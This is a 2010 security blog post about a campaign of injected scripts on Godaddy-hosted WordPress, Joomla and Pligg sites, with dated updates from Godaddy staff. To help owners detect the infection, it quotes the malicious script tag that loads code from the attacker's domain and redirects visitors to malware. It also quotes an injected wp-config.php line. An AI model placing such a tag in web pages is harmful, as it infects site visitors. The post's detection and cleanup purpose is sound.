On May 1, 2010, Hosting providers were hacked again with malicious attacks similar to last month containing the kdjkfjskdfjlskdjf dot com code. WPSecurityLock has reported several sites that have been hacked for a second time. The variation appears to be the same script redirecting to different domains.
The recent attacks on self-hosted WordPress blog sites has expanded to the Joomla and Pligg platforms as well as WordPress. These latest attacks show the need for security hardening of all sites. WPSecurityLock recommends strong passwords and appropriate file permissions as well as putting in robust security measures. Webmasters are responsible for securing their sites. The hosting companies must have vulnerabilities that need to be closed.
At 8:00 am (CST) on May 1, 2010, We, at WPSecurityLock, have reported this current issue to Godaddy's Information Security Operations department. We are awaiting feedback and will share it with you on this post as soon as it arrives.
For information on how to remove this dangerous malware on your Godaddy Linux hosting account, see this article for instructions -
Cechirecom.com.js.php - WordPress Hacked | Case Study
Please check your website and see if it redirects you to an unwanted website. Or look in your source code for the following malicious code located above the </body> tag:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
And redirects to: protectsys28-pd.xorg.pl...
This malware tries to send a virus to your visitor's computer. Here's a screenshot of what was blocked by my *AVG program:
For WordPress Hacked Site cleanup and security enhancements use our contact form.
UPDATE 5/1/2010 at 11:20 am CST: We have heard from Godaddy and they are aware and are investigating right now! As soon as they give us new information, we will update this post to keep you informed.
If you're site has been infected, please send us an email with your domain name and date and time you were attacked so we can continue to send reports to Godaddy. We want to help as much as we can to help you.
UPDATE: 5/1/2010 at 1:20pm CST: If your website has been infected and is not using WordPress, please email us your domain name so we can have it checked.
UPDATE 5/1/2010 at 3:09 pm CST: We just found some mystery files and code.
CAUTION: We just found some weird code in a WordPress wp-config.php file. This code was injected on April 21 on a site we are fixing now.
$GLOBALS['mr_no'] = 1;
We also found a mystery file in the root: test-soc.php,which contains the base64_decode script.
Please check your websites for this now.
If anyone has information as to what this is, please let us know.
UPDATE 5/1/2010 at 3:10pm CST: Salem, from Godaddy.com, has left a comment below. Here's the latest update from Godaddy...
We've been in contact with WPSecurityLock.com and we're actively working with them to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK .
Please note that we also investigated and found the cause of the issue last week, and while there are similarities, we're treating this as a new and separate issue.
As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware on other CMS applications have the commonality that part of the site is powered by WordPress.
Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .
^Salem
UPDATE 5/3/2010 at 2:00pm CST: We have a conference call with the Godaddy team later this afternoon. We will keep you posted on the outcome.
We have received thousands of emails information about websites being hacked. We truly appreciate you contacting us. We will respond as fast as humanly possible.
UPDATE 5/3/2010 at 7:13pm CST: Go Daddy cares! Here's some info...
UPDATE 5/5/2010 at 3:00pm CST: We'd like to thank Scott from Go Daddy's IT Security Operations department for speaking at our teleseminar today. The audio replay is now available on the webcast page. If you missed this event, you can still register here and listen to the replay.
Scott has provided the following helpful links for you:
How to identify the version of WordPress you're using: http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/is-my-wordpress-version-up-to-date/
Our community thread on best practices for cleaning: http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it
Upgrading WordPress the "best practice" way:
http://help.godaddy.com/article/6072
Form to contact our Security Team:
www.godaddy.com/securityissue
UPDATE 5/5/2010 at 5:00 pm CST: We have just uploaded a portion of today's WordPress Security Teleseminar with Scott from Go Daddy. You can listen to the audio by pressing the play button below:
Audio clip: Adobe Flash Player (version 9 or above) is required to play this audio clip. Download the latest version here. You also need to have JavaScript enabled in your browser.
We need your help...
In order to help spread awareness about this malware attack, click the share button below to link this post to your Twitter, Facebook, email, etc.
If you have any questions or have any further information about this malicious malware, please leave a comment below so that we can keep our readers informed.
Get Secure! Stay Secure!
Allen Dresser
Internet Tech Guy
www.internettechguy.com
http://twitter.com/internettechguy
Follow WPSecurityLock on Twitter
REGISTER NOW TO LISTEN TO THE AUDIO REPLAY WITH GO DADDY AND WPSECURITYLOCK!
You can still listen our WordPress Security Teleseminar Replay with special guest, Scott from Go Daddy recorded on May 5, 2010. Plus, you can still sign up for our May 19, 2010 at 9pm EST teleseminar. You can participate live from anywhere in the world. Click Here To Register Now!
*Denotes our affiliate link, see our Disclosure.
Download the "7 Plugins for WordPress Security" report and get WordPress Security news to stay informed and avoid getting hacked.
Kristi - love your site! thanks for the tweet and spreading the word. The hackers are causing lots of good folks a lot of trouble... Have your sites stayed secure? Who do you host with?